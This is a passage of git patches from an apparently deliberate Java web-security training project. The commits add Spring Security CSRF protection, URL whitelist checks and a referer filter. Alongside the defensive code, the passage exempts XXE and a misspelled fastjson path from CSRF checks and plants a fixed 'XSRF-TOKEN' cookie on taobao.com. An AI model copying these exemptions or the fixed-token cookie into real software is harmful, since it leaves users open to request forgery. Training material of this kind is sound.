 src/main/resources/templates/csrfTest.html    | 27 ++++++++++++++++
 8 files changed, 136 insertions(+), 8 deletions(-)
 create mode 100644 src/main/java/org/joychou/WebSecurityConfig.java
 create mode 100644 src/main/java/org/joychou/controller/CSRF.java
 create mode 100644 src/main/java/org/joychou/controller/Test.java
 create mode 100644 src/main/resources/templates/csrfTest.html

diff --git a/README.md b/README.md
index e32e9b2e..1e8d2130 100644
--- a/README.md
+++ b/README.md
@@ -25,6 +25,7 @@
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CSRF.java)
 
 ## 漏洞说明
 
@@ -36,6 +37,7 @@
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 2cf50e4e..121c97a1 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -12,7 +12,7 @@
       </configuration>
     </facet>
   </component>
-  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+  <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_6">
     <output url="file://$MODULE_DIR$/target/classes" />
     <output-test url="file://$MODULE_DIR$/target/test-classes" />
     <content url="file://$MODULE_DIR$">
@@ -41,7 +41,6 @@
     <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-core:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.yaml:snakeyaml:1.17" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.11" level="project" />
@@ -55,11 +54,7 @@
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.8.0" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.8.6" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-web:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-aop:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-beans:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-context:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-webmvc:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.springframework:spring-expression:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-thymeleaf:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
@@ -125,7 +120,6 @@
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.sun.jersey.contribs:jersey-apache-client4:1.19.1" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.google.inject:guice:4.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: javax.inject:javax.inject:1" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: aopalliance:aopalliance:1.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator-api:1.12.10" level="project" />
     <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-core:1.4.11" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.governator:governator:1.12.10" level="project" />
@@ -165,5 +159,15 @@
     <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
     <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
     <orderEntry type="library" name="Maven: com.fasterxml.uuid:java-uuid-generator:3.1.4" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-web:4.2.12.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: aopalliance:aopalliance:1.0" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-core:4.2.1.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-beans:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-context:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-core:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-expression:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.security:spring-security-config:4.2.12.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-aop:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-security:2.1.5.RELEASE" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index b2aa7838..ea72cdf6 100644
--- a/pom.xml
+++ b/pom.xml
@@ -136,6 +136,25 @@
             <version>3.1.4</version>
         </dependency>
 
+        <!-- 5.x的spring-security版本不适配springboot 1.5，因为1.5的springboot的spring-core版本是4.x，所以spring-security改为4.x即可适配。 -->
+        <dependency>
+            <groupId>org.springframework.security</groupId>
+            <artifactId>spring-security-web</artifactId>
+            <version>4.2.12.RELEASE</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.security</groupId>
+            <artifactId>spring-security-config</artifactId>
+            <version>4.2.12.RELEASE</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-security</artifactId>
+            <version>2.1.5.RELEASE</version>
+        </dependency>
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 3b05f723..8749342a 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -8,7 +8,7 @@
 
 
 @SpringBootApplication
-@EnableEurekaClient
+// @EnableEurekaClient  // 测试Eureka请打开注释，防止控制台一直有warning
 public class Application extends SpringBootServletInitializer {
 
     @Override
diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/WebSecurityConfig.java
new file mode 100644
index 00000000..76addad7
--- /dev/null
+++ b/src/main/java/org/joychou/WebSecurityConfig.java
@@ -0,0 +1,20 @@
+package org.joychou;
+
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.config.annotation.web.builders.HttpSecurity;
+import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
+import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
+
+@EnableWebSecurity
+@Configuration
+public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
+
+    @Override
+    protected void configure(HttpSecurity http) throws Exception {
+        // http.csrf().disable()  // 去掉csrf校验
+        // 默认token存在session里，现在改为token存在cookie里。但存在后端多台服务器情况，session不能同步的问题，所以一般使用cookie模式。
+        http.csrf().csrfTokenRepository(new CookieCsrfTokenRepository());
+        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
+    }
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/CSRF.java b/src/main/java/org/joychou/controller/CSRF.java
new file mode 100644
index 00000000..ebef75c8
--- /dev/null
+++ b/src/main/java/org/joychou/controller/CSRF.java
@@ -0,0 +1,31 @@
+package org.joychou.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.PostMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+/**
+ * @author: JoyChou (joychou@joychou.org)
+ * @date:   2019.05.31
+ * @desc:   check csrf using spring-security
+ * @using:  access http://localhost:8080/csrf/ -> click submit
+ */
+
+
+@Controller
+@RequestMapping("/csrf")
+public class CSRF {
+
+    @GetMapping("/")
+    public String index() {
+        return "csrfTest";
+    }
+
+    @PostMapping("/post")
+    @ResponseBody
+    public String post() {
+        return "CSRF passed.";
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Test.java b/src/main/java/org/joychou/controller/Test.java
new file mode 100644
index 00000000..b7374f1d
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Test.java
@@ -0,0 +1,25 @@
+package org.joychou.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.Cookie;
+import javax.servlet.http.HttpServletResponse;
+
+@Controller
+@RequestMapping("/test")
+public class Test {
+
+    @RequestMapping(value = "/")
+    @ResponseBody
+    private String Index(HttpServletResponse response) {
+
+        Cookie cookie = new Cookie("XSRF-TOKEN", "123");
+        cookie.setDomain("taobao.com");
+        cookie.setMaxAge(-1); // forever time
+        response.addCookie(cookie);
+        return "success";
+    }
+
+}
diff --git a/src/main/resources/templates/csrfTest.html b/src/main/resources/templates/csrfTest.html
new file mode 100644
index 00000000..b2916c8d
--- /dev/null
+++ b/src/main/resources/templates/csrfTest.html
@@ -0,0 +1,27 @@
+
+<html xmlns:th="http://www.thymeleaf.org" lang="en">
+
+<body>
+
+
+<div>
+    <form name="f" th:action="@{/csrf/post}" method="post">
+        <input type="text" name="input" />
+        <input type="submit" value="Submit" />
+    </form>
+</div>
+
+
+</body>
+
+
+<!-- <input type="hidden" th:name="${_csrf.parameterName}" th:value="${_csrf.token}" />  -->
+
+<!--<script>-->
+    <!--window.csrfToken = {-->
+        <!--tokenName: "${_csrf.parameterName}",-->
+        <!--tokenValue: "${_csrf.token}"-->
+    <!--};-->
+<!--</script>-->
+
+</html>
\ No newline at end of file

From dd3792de9186f689b848eb0974aa7f8ce7c7965b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 31 May 2019 11:48:33 +0800
Subject: [PATCH 019/108] update readme

---
 README.md | 1 -
 1 file changed, 1 deletion(-)

diff --git a/README.md b/README.md
index 1e8d2130..9f3ab76c 100644
--- a/README.md
+++ b/README.md
@@ -37,7 +37,6 @@
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
-- [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 

From 72a54fa5dfe5d91a13090d18b9c25114ea0e4f9a Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 31 May 2019 14:15:02 +0800
Subject: [PATCH 020/108] add csrf whitelist uri and req method

---
 .../java/org/joychou/WebSecurityConfig.java   | 27 +++++++++++++++++--
 .../java/org/joychou/controller/Fastjson.java |  2 +-
 2 files changed, 26 insertions(+), 3 deletions(-)

diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/WebSecurityConfig.java
index 76addad7..41461d0c 100644
--- a/src/main/java/org/joychou/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/WebSecurityConfig.java
@@ -5,16 +5,39 @@
 import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
 import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
+import org.springframework.security.web.util.matcher.RequestMatcher;
+
+import javax.servlet.http.HttpServletRequest;
+import java.util.regex.Pattern;
 
 @EnableWebSecurity
 @Configuration
 public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
 
+    RequestMatcher csrfRequestMatcher = new RequestMatcher() {
+
+        // 配置不需要CSRF校验的请求方式
+        private Pattern allowedMethods =
+                Pattern.compile("^(GET|HEAD|TRACE|OPTIONS)$");
+
+        @Override
+        public boolean matches(HttpServletRequest request) {
+            // CSRF disabled on allowedMethod
+            // false表示不校验csrf
+            return !(allowedMethods.matcher(request.getMethod()).matches());
+        }
+
+    };
+
     @Override
     protected void configure(HttpSecurity http) throws Exception {
         // http.csrf().disable()  // 去掉csrf校验
-        // 默认token存在session里，现在改为token存在cookie里。但存在后端多台服务器情况，session不能同步的问题，所以一般使用cookie模式。
-        http.csrf().csrfTokenRepository(new CookieCsrfTokenRepository());
+        // 默认token存在session里，用CookieCsrfTokenRepository改为token存在cookie里。
+        // 但存在后端多台服务器情况，session不能同步的问题，所以一般使用cookie模式。
+        http.csrf()
+                .requireCsrfProtectionMatcher(csrfRequestMatcher)
+                .ignoringAntMatchers("/xxe/**", "/fastjon/**")  // 不进行csrf校验的uri，多个uri使用逗号分隔
+                .csrfTokenRepository(new CookieCsrfTokenRepository());
         // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
     }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/Fastjson.java b/src/main/java/org/joychou/controller/Fastjson.java
index 8359a1bc..6609ad54 100644
--- a/src/main/java/org/joychou/controller/Fastjson.java
+++ b/src/main/java/org/joychou/controller/Fastjson.java
@@ -14,7 +14,7 @@
 @RequestMapping("/fastjson")
 public class Fastjson {
 
-    @RequestMapping(value = "deserialize", method = {RequestMethod.POST })
+    @RequestMapping(value = "/deserialize", method = {RequestMethod.POST })
     @ResponseBody
     public static String Deserialize(@RequestBody String params) {
         // 如果Content-Type不设置application/json格式，post数据会被url编码

From 2e542b64e465f4284d873561a6f8ddc578765d24 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 31 May 2019 14:17:47 +0800
Subject: [PATCH 021/108] update readme

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md
index 9f3ab76c..13af7e81 100644
--- a/README.md
+++ b/README.md
@@ -25,7 +25,7 @@
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
 - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml)
-- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CSRF.java)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java)
 
 ## 漏洞说明
 

From 4a021750c4e38113c0048728cc9da74c3f869b43 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 31 May 2019 16:18:29 +0800
Subject: [PATCH 022/108] update csrf allowedMethods code

---
 src/main/java/org/joychou/WebSecurityConfig.java | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/WebSecurityConfig.java
index 41461d0c..c6724dd8 100644
--- a/src/main/java/org/joychou/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/WebSecurityConfig.java
@@ -8,7 +8,8 @@
 import org.springframework.security.web.util.matcher.RequestMatcher;
 
 import javax.servlet.http.HttpServletRequest;
-import java.util.regex.Pattern;
+import java.util.Arrays;
+import java.util.HashSet;
 
 @EnableWebSecurity
 @Configuration
@@ -17,14 +18,13 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter {
     RequestMatcher csrfRequestMatcher = new RequestMatcher() {
 
         // 配置不需要CSRF校验的请求方式
-        private Pattern allowedMethods =
-                Pattern.compile("^(GET|HEAD|TRACE|OPTIONS)$");
+        private final HashSet<String> allowedMethods = new HashSet<String>(
+                Arrays.asList("GET", "HEAD", "TRACE", "OPTIONS"));
 
         @Override
         public boolean matches(HttpServletRequest request) {
-            // CSRF disabled on allowedMethod
-            // false表示不校验csrf
-            return !(allowedMethods.matcher(request.getMethod()).matches());
+            // return false表示不校验csrf
+            return !this.allowedMethods.contains(request.getMethod());
         }
 
     };

From 9bed870ed3641023eadd30bd8627f537beebcb9e Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 5 Jun 2019 13:42:33 +0800
Subject: [PATCH 023/108] csrf in upload file html

---
 src/main/resources/templates/upload.html    | 2 +-
 src/main/resources/templates/uploadPic.html | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/main/resources/templates/upload.html b/src/main/resources/templates/upload.html
index 10898e0b..03ecf15f 100755
--- a/src/main/resources/templates/upload.html
+++ b/src/main/resources/templates/upload.html
@@ -4,7 +4,7 @@
 
 <h3>file upload</h3>
 
-<form method="POST" action="upload" enctype="multipart/form-data">
+<form method="POST" th:action="upload" enctype="multipart/form-data">
     <input type="file" name="file" /><br/><br/>
     <input type="submit" value="Submit" />
 </form>
diff --git a/src/main/resources/templates/uploadPic.html b/src/main/resources/templates/uploadPic.html
index ce056aa7..66a6f64d 100644
--- a/src/main/resources/templates/uploadPic.html
+++ b/src/main/resources/templates/uploadPic.html
@@ -4,7 +4,7 @@
 
 <h3>file upload only picture</h3>
 
-<form method="POST" action="upload/picture" enctype="multipart/form-data">
+<form method="POST" th:action="@{upload/picture}" enctype="multipart/form-data">
     <input type="file" name="file" /><br/><br/>
     <input type="submit" value="Submit" />
 </form>

From 86d2551b2e4578f9d603901c424f4b4d1a689675 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 10 Jun 2019 20:17:37 +0800
Subject: [PATCH 024/108] diy csrf error code

---
 .../org/joychou/CsrfAccessDeniedHandler.java  | 26 +++++++
 .../java/org/joychou/WebSecurityConfig.java   |  2 +-
 .../org/joychou/controller/URLWhiteList.java  | 72 ++++++++++++++++++-
 3 files changed, 97 insertions(+), 3 deletions(-)
 create mode 100644 src/main/java/org/joychou/CsrfAccessDeniedHandler.java

diff --git a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
new file mode 100644
index 00000000..4f3e3c3f
--- /dev/null
+++ b/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
@@ -0,0 +1,26 @@
+package org.joychou;
+
+
+import org.springframework.http.MediaType;
+import org.springframework.security.access.AccessDeniedException;
+import org.springframework.security.web.access.AccessDeniedHandler;
+
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
+
+
+    @Override
+    public void handle(HttpServletRequest request, HttpServletResponse response,
+                       AccessDeniedException accessDeniedException) throws IOException, ServletException {
+        response.setContentType(MediaType.TEXT_HTML_VALUE);
+        response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+        response.getWriter().write("CSRF check failed by JoyChou.");
+    }
+
+}
+
diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/WebSecurityConfig.java
index c6724dd8..cb177a28 100644
--- a/src/main/java/org/joychou/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/WebSecurityConfig.java
@@ -6,7 +6,6 @@
 import org.springframework.security.config.annotation.web.configuration.WebSecurityConfigurerAdapter;
 import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
 import org.springframework.security.web.util.matcher.RequestMatcher;
-
 import javax.servlet.http.HttpServletRequest;
 import java.util.Arrays;
 import java.util.HashSet;
@@ -38,6 +37,7 @@ protected void configure(HttpSecurity http) throws Exception {
                 .requireCsrfProtectionMatcher(csrfRequestMatcher)
                 .ignoringAntMatchers("/xxe/**", "/fastjon/**")  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
+        http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
         // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
     }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index fb67e013..f3b75693 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -115,8 +115,7 @@ public String urlVul(HttpServletRequest request) throws Exception{
         }
     }
 
-
-    // 安全代码
+    // 利用InternetDomainName库获取一级域名的安全代码 (一级域名白名单)
     @RequestMapping("/seccode")
     @ResponseBody
     public String seccode(HttpServletRequest request) throws Exception{
@@ -141,4 +140,73 @@ public String seccode(HttpServletRequest request) throws Exception{
             return "URL is illegal";
         }
     }
+
+    /**
+     * @desc 自定义一级域名白名单
+     * @usage http://localhost:8080/url/seccode1?url=http://aa.taobao.com
+     * @param request
+     * @return
+     * @throws Exception
+     */
+    @RequestMapping("/seccode1")
+    @ResponseBody
+    public String seccode1(HttpServletRequest request) throws Exception{
+
+        // 定义一级域名白名单list，用endsWith加上.判断
+        String whiteDomainlists[] = {"taobao.com", "tmall.com"};
+
+        String url = request.getParameter("url");
+        System.out.println("url:  " + url);
+        URI uri = new URI(url);
+        URL u = new URL(url);
+        // 判断是否是http(s)协议
+        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
+            return "URL is not http or https";
+        }
+        // 使用uri获取host
+        String host = uri.getHost().toLowerCase();
+        System.out.println("host:  " + host);
+
+        for (String domain: whiteDomainlists){
+            if (host.endsWith("." + domain)) {
+                return "good url";
+            }
+        }
+
+        return "bad url";
+    }
+
+    /**
+     * @desc 自定义多级域名白名单
+     * @usage http://localhost:8080/url/seccode2?url=http://ccc.bbb.taobao.com
+     * @param request
+     * @return
+     * @throws Exception
+     */
+    @RequestMapping("/seccode2")
+    @ResponseBody
+    public String seccode2(HttpServletRequest request) throws Exception{
+
+        // 定义多级域名白名单，判断使用equals
+        String whiteDomainlists[] = {"aaa.taobao.com", "ccc.bbb.taobao.com"};
+
+        String url = request.getParameter("url");
+        System.out.println("url:  " + url);
+        URI uri = new URI(url);
+        URL u = new URL(url);
+        // 判断是否是http(s)协议
+        if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
+            return "URL is not http or https";
+        }
+        // 使用uri获取host
+        String host = uri.getHost().toLowerCase();
+        System.out.println("host:  " + host);
+
+        for (String domain: whiteDomainlists){
+            if (host.equals(domain)) {
+                return "good url";
+            }
+        }
+        return "bad url";
+    }
 }

From f0cb9a42c1c6ca6b4bf711c22cf10d1aa38037c5 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 19 Jun 2019 00:18:58 +0800
Subject: [PATCH 025/108] add filter to check referer

---
 README.md                                     |   1 +
 src/main/java/org/joychou/Application.java    |   2 +
 .../org/joychou/CsrfAccessDeniedHandler.java  |  10 +-
 .../java/org/joychou/WebSecurityConfig.java   |   1 +
 .../java/org/joychou/controller/CORS.java     |   5 +-
 .../org/joychou/controller/FileUpload.java    |  16 +-
 .../java/org/joychou/controller/JSONP.java    |  15 +-
 .../org/joychou/controller/URLWhiteList.java  | 169 +++++++++++-------
 .../org/joychou/security/SecurityUtil.java    |  39 ++++
 .../java/org/joychou/security/secFilter.java  |  54 ++++++
 src/main/java/org/joychou/utils/Security.java |  59 ------
 11 files changed, 227 insertions(+), 144 deletions(-)
 create mode 100644 src/main/java/org/joychou/security/SecurityUtil.java
 create mode 100644 src/main/java/org/joychou/security/secFilter.java
 delete mode 100644 src/main/java/org/joychou/utils/Security.java

diff --git a/README.md b/README.md
index 13af7e81..c2fe8aca 100644
--- a/README.md
+++ b/README.md
@@ -37,6 +37,7 @@
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/wiki/Actuators-to-RCE)
+- [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/src/main/java/org/joychou/Application.java b/src/main/java/org/joychou/Application.java
index 8749342a..85d0aab8 100644
--- a/src/main/java/org/joychou/Application.java
+++ b/src/main/java/org/joychou/Application.java
@@ -3,10 +3,12 @@
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 import org.springframework.boot.builder.SpringApplicationBuilder;
+import org.springframework.boot.web.servlet.ServletComponentScan;
 import org.springframework.boot.web.support.SpringBootServletInitializer;
 import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
 
 
+@ServletComponentScan
 @SpringBootApplication
 // @EnableEurekaClient  // 测试Eureka请打开注释，防止控制台一直有warning
 public class Application extends SpringBootServletInitializer {
diff --git a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
index 4f3e3c3f..27d72d95 100644
--- a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/CsrfAccessDeniedHandler.java
@@ -13,13 +13,15 @@
 
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
-
+    /**
+     * @desc 返回自定义拦截页面
+     */
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
                        AccessDeniedException accessDeniedException) throws IOException, ServletException {
-        response.setContentType(MediaType.TEXT_HTML_VALUE);
-        response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-        response.getWriter().write("CSRF check failed by JoyChou.");
+        response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html
+        response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden
+        response.getWriter().write("CSRF check failed by JoyChou.");  // response
     }
 
 }
diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/WebSecurityConfig.java
index cb177a28..5254547e 100644
--- a/src/main/java/org/joychou/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/WebSecurityConfig.java
@@ -37,6 +37,7 @@ protected void configure(HttpSecurity http) throws Exception {
                 .requireCsrfProtectionMatcher(csrfRequestMatcher)
                 .ignoringAntMatchers("/xxe/**", "/fastjon/**")  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
+        // 自定义csrf校验失败的代码，默认是返回403错误页面
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
         // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
     }
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index 2974b64a..bb6ec779 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -1,6 +1,6 @@
 package org.joychou.controller;
 
-import org.joychou.utils.Security;
+import org.joychou.security.SecurityUtil;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.CrossOrigin;
 import org.springframework.web.bind.annotation.RequestMapping;
@@ -52,11 +52,10 @@ private static String vuls3(HttpServletResponse response) {
     @ResponseBody
     private static String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
-        Security sec = new Security();
 
         // 如果origin不为空并且origin不在白名单内，认定为不安全。
         // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求。
-        if ( origin != null && !sec.checkSafeUrl(origin, urlwhitelist) ) {
+        if ( origin != null && !SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) ) {
             return "Origin is not safe.";
         }
         response.setHeader("Access-Control-Allow-Origin", origin);
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 133ddb73..f2afa10a 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -9,6 +9,8 @@
 import org.springframework.web.multipart.MultipartFile;
 import org.springframework.web.servlet.mvc.support.RedirectAttributes;
 
+import javax.imageio.ImageIO;
+import java.awt.image.BufferedImage;
 import java.io.File;
 import java.io.FileOutputStream;
 import java.io.IOException;
@@ -17,8 +19,6 @@
 import java.nio.file.Paths;
 import java.util.UUID;
 
-import static org.joychou.utils.Security.isImage;
-
 
 /**
  * @author: JoyChou (joychou@joychou.org)
@@ -154,4 +154,16 @@ private File convert(MultipartFile multiFile) throws Exception {
         fos.close();
         return convFile;
     }
+
+    /**
+     * @param file
+     * @desc 判断文件内容是否是图片
+     */
+    public static boolean isImage(File file) throws IOException {
+        BufferedImage bi = ImageIO.read(file);
+        if (bi == null) {
+            return false;
+        }
+        return true;
+    }
 }
diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java
index b50ea530..971deeee 100644
